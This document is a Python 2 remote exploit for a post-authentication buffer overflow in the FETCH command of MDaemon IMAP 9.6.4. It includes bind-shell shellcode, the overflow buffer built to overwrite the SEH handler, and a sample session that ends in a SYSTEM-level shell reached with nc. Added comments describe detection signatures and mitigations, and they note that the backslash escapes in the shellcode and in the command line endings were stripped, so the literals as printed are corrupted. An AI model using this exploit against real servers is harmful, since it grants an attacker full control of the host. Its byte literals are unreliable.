
# Title : MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit
# Published : 2008-03-13
# Author : Matteo Memelli


#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin 
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4 
# Tested on OS      : Windows 2000 SP4 English
#                     Windows XP Sp2 English
#                     Windows 2003 Standard Edition Italian
# Discovery Date               : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec 
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (Seen Answered Flagged Deleted Draft Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (Seen Answered Flagged Deleted Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>whoami
# whoami
# NT AUTHORITY\SYSTEM
#
# C:\MDaemon\APP>
##############################################################################

from socket import *
from optparse import OptionParser
import sys, time

# Banner and command-line handling. The script is Python 2 throughout (print
# statements, optparse) and will not run unmodified under Python 3.
print "[*********************************************************************]"
print "[*                                                                   *]"
print "[*    MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT     *]"
print "[*                      DISCOVERED AND CODED                         *]"
print "[*                               by                                  *]"
print "[*                         MATTEO MEMELLI                            *]" 
print "[*                            (ryujin)                               *]" 
print "[*              www.be4mind.com - www.gray-world.net                 *]"
print "[*                                                                   *]"
print "[*********************************************************************]"
# Four parameters are required: the target host/port and a valid mailbox
# login. The header calls this a post-auth bug and the exchange further down
# confirms it -- nothing but a LOGIN is sent before the malformed FETCH -- so a
# working IMAP account is the precondition; mailbox credential hygiene and
# restricting which networks can reach the IMAP port are what reduce exposure
# short of updating past the affected version named in the header.
usage =  "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
                  action="store", dest="HOST",
                  help="Target Host")
parser.add_option("-P", "--target_port", type="int",
                  action="store", dest="PORT",
                  help="Target Port")
parser.add_option("-l", "--login-user", type="string",
                  action="store", dest="USER",
                  help="User login")
parser.add_option("-p", "--login-password", type="string",
                  action="store", dest="PASSWD",
                  help="User password")
(options, args) = parser.parse_args()
HOST    = options.HOST
PORT    = options.PORT
USER    = options.USER
PASSWD  = options.PASSWD
# Any missing option prints the help text and exits. Note that sys.exit() with
# no argument exits with status 0, so a calling script cannot tell this apart
# from success.
if not (HOST and PORT and USER and PASSWD):
   parser.print_help()
   sys.exit()

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
# Payload as published: a Metasploit bind-shell stub that, per its own
# parameters above, listens on TCP 4444 on the mail server (the final status
# line of the script hard-codes the same port). From the defender's side the
# observable is the MDaemon IMAP service process opening a new listening
# socket it never normally opens; the sample session in the header shows the
# resulting command prompt running as NT AUTHORITY\SYSTEM, i.e. full host
# compromise, not just mailbox access.
# NOTE(review): in this archived copy the backslashes of the "\x.." escapes
# (and of the "\r\n" line endings in the IMAP commands below) appear to have
# been stripped by the site's extraction, so these literals are plain ASCII
# text rather than the byte sequences the author shipped. The listing is kept
# verbatim.
shellcode = (
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b"
"x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01"
"xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07"
"xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f"
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b"
"x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c"
"x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff"
"xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0"
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08"
"x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53"
"x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66"
"x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51"
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0"
"x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93"
"x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66"
"x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38"
"xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57"
"x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9"
"x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83"
"xc4x64xffxd6x52xffxd0x68xefxcexe0x60x53xffxd6"
"xffxd0"
)

# The IMAP exchange, one tagged command per step; each reply is printed, which
# is where the transcript in the file header comes from.
s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)  # server greeting
print " [+] Logging in..."
# Plain LOGIN on an unencrypted TCP socket: the mailbox credentials cross the
# wire in the clear. Each reply is read with a single recv(1024), so a reply
# that arrives in more than one segment would leave the following command out
# of step with the server.
s.send("0001 LOGIN %s %srn" % (USER, PASSWD))
print s.recv(1024)
print " [+] Selecting Inbox Folder..."
s.send("0002 SELECT Inboxrn")
print s.recv(1024)
print " [+] We need at least one message in Inbox, appending one..."
# A literal is APPENDed first so that the FETCH below has a message to act on;
# an empty mailbox would otherwise never reach the vulnerable path.
s.send('0003 APPEND Inbox {1}rn')
print s.recv(1024)
print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
s.send('SPAGHETTI AND PWNSAUCErn')
print s.recv(1024)
print " [+] DINNER'S READY: Sending Evil Buffer..."
# Seh overwrite at 532 Bytes 
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
# The oversized buffer travels inside the BODY[...] section specifier of a
# FETCH command. A legitimate section specifier is a short token (HEADER,
# TEXT, a part number), so a FETCH whose section string runs to hundreds of
# bytes is the signature to alert on at an IMAP-aware IDS, and a server-side
# length check on that string is the corresponding mitigation for anyone
# still on the affected version listed in the header.
EVIL = "A"*528 + "xEBx06x90x90" + "x8bx11xdcx64" + "x90"*8 + shellcode + 'C'*35 
s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])rn")
# The FETCH response is never read and the success line is unconditional, so
# "DONE!" is printed whether or not the server actually fell over.
s.close()
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
